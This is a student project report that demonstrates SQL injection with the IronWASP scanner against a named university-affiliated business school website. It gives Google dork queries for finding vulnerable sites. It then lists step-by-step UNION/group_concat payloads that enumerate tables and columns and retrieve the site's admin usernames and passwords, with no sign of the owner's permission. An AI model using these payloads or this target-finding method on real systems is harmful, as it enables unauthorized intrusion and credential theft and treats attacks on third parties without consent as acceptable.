Project Report
IRONWASP
Class Teacher
Sir Waqar Ahmed
PAF KIET
Submitted by
Muhammad BurhanShafaat
54596
DEPARTMENT OF COMPUTER SCIENCE
PAF Karachi Institute of Economics and Technology
28-D, Block 6, P.E.C.H.S, Karachi 75400
Dec 2014
�PREFACE
It gives me a sense of satisfaction and pleasure at the same time while writing the
preface for the IRONWASPproject report. It took several weeks of immense hard work and
tiredness to complete this project.
My intention has been to produce a report which covers completely all the aspects of
this project. Therefore, I have presented the project report in a way which is accessible to
everyone.
As use of the computers in industry, commerce, education and many other fields of
life have become very common; the question of information and system security arises.
Avoiding attacks on information and network wouldnt be that easy. It requires a lot of effort
to avoid these attacks. This report discusses SQL injection vulnerability identification and
attacking.
A thorough study has been carried out of the topic. All the material has been collected
in relevance with the SQL injection vulnerability. This report is carefully designed to offer
information appropriate for SQL Injection vulnerability. All the topics are comprehensively
dealt with to give reader a firm grounding in the issue. Explanations of concepts and
principles are concise and written in clear and simple language with supportive illustrations
where required. Different diagrams are provided to make this report even more logical and
understandable for the reader.
Muhammad Burhan
ii
�ACKNOWLEDGMENT
First of all, I thank Almighty Allah who praised me with the ability to think, work and
deliver what I was assigned to do. Without His mercy it was not possible at all.
Secondly, I am grateful to my teacher Mr. Waqar Ahmed who was always there to
guide me and sort out my problems. I also acknowledge my all teachers, who throughout my
studies help me and guide me, departmental staff, and university staff.
I then wish to show appreciation to all those individuals who have helped me in any
way, in the making of this project
Muhammad Burhan
iii
�TABLE OF CONTENTS
PREFACE
ii
ACKNOWLEDGEMENTS
iii
TABLE OF CONTENTS
iv
Chapter 1
INTRODUCTION
01
Objective
Theoretical Background
Project Scope
01
01
02
IRONWASP
03
Introduction to Iron WASP
Reason for Iron WASP Selection
03
04
LAUNCHING ATTACK
05
How to Find Target?
Target
Start Attack
05
05
07
CONCLUSION
11
Conclusion
11
1.1
1.2
1.3
Chapter 2
2.1
2.2
Chapter 3
3.1
3.2
3.3
Chapter 4
4.1
Appendix A
A.1
REFERENCES
WEB References
12
12
iv
�INTRODUCTION
1
Introduction
This chapter gives a brief introduction to the project. It provides the objective,
theoretical background and project scope.
1.1
Objective
The aim of my project is to attack on a website using IRONWASP for SQL Injection
vulnerability detection and also attack on effected website using SQL Injection.
1.2
Theoretical Background
What is SQL injection?
SQL injection is a code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker).
What is software vulnerability?
Software vulnerability is a security flaw, glitch, or weakness found
insoftware or in an operating system (OS) that can lead to security concerns. An
example of a software flaw is a buffer overflow.
What is IronWASP?
�IronWASP(Iron Web application Advanced Security testing Platform) is one
of the world's best web vulnerability scanners.
1.3
Project Scope
1- To understand and demonstrate the working of Iron Wasp.
2- Identify vulnerability using Iron Wasp.
3- Perform attack using SQL Injection.
vi
�CHAPTER 2
IRONWASP
2
Iron WASP
This chapter gives you introduction to Iron WASP. It provides introduction and
reason for the selection of Iron WASP.
2.1
Introduction to Iron WASP
WASP(Iron Web application Advanced Security testing Platform) is one of the
world's best web vulnerability scanners. It is developed by LavakumarKuppan. It is
designed to make automated scanning and testing an easy process. It is an open source system
for web application vulnerability testing. It is designed to be customizable to the extent where
users can create their own custom security scanners using it. Though an advanced user with
Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the
tool's features are simple enough to be used by absolute beginners.
vii
�Figure 1: Iron WASP Interface
2.2
Reasons for Iron WASP Selection
1- It's Free and Open source.
2- GUI based and very easy to use, no security expertise required.
3- Powerful and effective scanning engine.
4- Supports recording Login sequence.
5- Reporting in both HTML and RTF formats.
6- Checks for over 25 different kinds of web vulnerabilities.
7- False Positives detection support.
8- False Negatives detection support.
9- Industry leading built-in scripting engine that supports Python and Ruby.
10- Extensible via plug-ins or modules in Python, Ruby, C# or [Link].
11- Comes bundled with a growing number of Modules built by researchers in the
security community.
viii
�CHAPTER 3
LAUNCHING ATTACK
2
Launching Attack
This chapter gives you idea how to launch attack? It provides details regarding the
target and launching the attack.
2.1
How to find the target?
Search on [Link] using following key words will help you to find target:
inurl: php?category=
inurl: php?id=
or with similar keywords
2.2
Target
My target is The Laureate Business School (website: [Link]
as shown in figure 2 which is affiliated with RPHAH International University.
ix
�The university offers several under graduate programs (BS, BSc, BBA, etc) as well as
graduate programs (MBA, etc). Figure 3 shows that SQL injection detected on the university
website (i.e. [Link]
Figure 2: Target website.
Figure 3: SQL Injection Vulnerability Detected
2.3
Start Attack
Step 1: Use order by clause to find the number columns in table.
Use order by clause and increase column number 1, 2, 3 n till you get error.
For Example:
x
�[Link]
[Link]
[Link]
:
:
[Link]
Figure 4 show that on 7th column we find following error as shown in figure 4 which
means that we have only 6 columns in table which is displaying data.
Figure 4: Shows error on 7th column.
Step 2: Finding columns that are displaying on page.
To find the columns that are displaying on web page we have use a union
query for example:
[Link]
Figure 5: Displayed Columns.
Step 3: Using group_concat function.
To group_concat function is used to display all table names of the given
schema. For example:
xi
�[Link]
ame)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1
The above link displayed few tables belongs the current schema:
admin,e-news, email_group, email_management, image_gallery, images_listing, navigation,
navigation_bk, news_and_events, notice_board and pages.
Figure 6: Table names.
Step 4: Find hex of the target table.
We have to enter hex code for table name in the query to execute this
successfully. The admin table is looking more interesting. Therefore I find the hex code of
admin which is 61646d696e.
Step 5: Finding column names of the table.
Group_concat will be use to display the column names. For example:
[Link]
_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order
+by+1
Figure 7: Shows the column names of admin table.
Step 6: Retrieving data.
In last step I successfully retrieved the column names (i.e. username and
password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results of
admin table.
xii
�[Link]
+,5,6+from+admin+order+by+1
Figure 8: Shows the data of admin table.
Step 7: Beyond this is not ethical.
I feel that moving ahead like delete, modify and inserting data into tables is
not ethical.
Chapter 3
CONCLUSION
3
Conclusion
As you have seen that I demonstrate the SQL injection technique. So we can insert,
update and delete any data and as well as database objects (like tables, views etc) using SQL
injection.
Therefore the desktop and web applications should be build on standards to avoid
attacks. Now-a-days there are several software products available which show the availability
of vulnerability in web and desktop applications.
xiii
�APPENDIX A
WEB REFERENCES
Web References
[1]
[Link]
(Target Website)
[2]
[Link] (Convert String to Hex)
xiv
